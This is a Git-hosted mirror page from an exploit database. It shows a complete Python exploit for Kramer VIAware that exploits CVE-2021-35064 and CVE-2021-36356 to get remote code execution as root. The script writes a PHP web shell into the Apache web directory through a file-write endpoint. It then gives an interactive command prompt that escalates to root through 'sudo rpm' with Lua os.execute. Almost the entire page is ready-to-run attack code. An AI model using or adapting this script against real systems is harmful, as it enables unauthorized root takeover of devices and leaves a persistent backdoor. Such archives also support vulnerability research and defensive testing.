bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/50856.py
Offensive Security 50cc2edafe DB: 2022-04-08 
9 changes to exploits/shellcodes

Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
binutils 2.37 - Objdump Segmentation Fault
Kramer VIAware - Remote Code Execution (RCE) (Root)
Opmon 9.11 - Cross-site Scripting
Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)
KLiK Social Media Website 1.0 - 'Multiple' SQLi
minewebcms 1.15.2 - Cross-site Scripting (XSS)
qdPM 9.2 - Cross-site Request Forgery (CSRF)
ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
2022-04-08 05:01:37 +00:00

65 lines
No EOL
2 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Remote Code Execution as Root on KRAMER VIAware
# Date: 31/03/2022
# Exploit Author: sharkmoos
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: *
# Tested on: ViaWare Go (Linux)
# CVE : CVE-2021-35064, CVE-2021-36356
import sys, urllib3
from requests import get, post
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def writeFile(host):
headers = {
"Host": f"{host}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "text/html, */*",
"Accept-Language": "en-GB,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Sec-Gpc": "1",
"Te": "trailers",
"Connection": "close"
}
# write php web shell into the Apache web directory
data = {
"radioBtnVal":"""<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}?>""",
"associateFileName": "/var/www/html/test.php"}
post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False)
def getResult(host, cmd):
# query the web shell, using rpm as sudo for root privileges
file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False)
pageText = file.text
if len(pageText) < 1:
result = "Command did not return a result"
else:
result = pageText
return result
def main(host):
# upload malicious php
writeFile(host)
command = ""
while command != "exit":
# repeatedly query the webshell
command = input("cmd:> ").strip()
print(getResult(host, command))
exit()
if __name__ == "__main__":
if len(sys.argv) == 2:
main(sys.argv[1])
else:
print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")
Reference in a new issue View git blame Copy permalink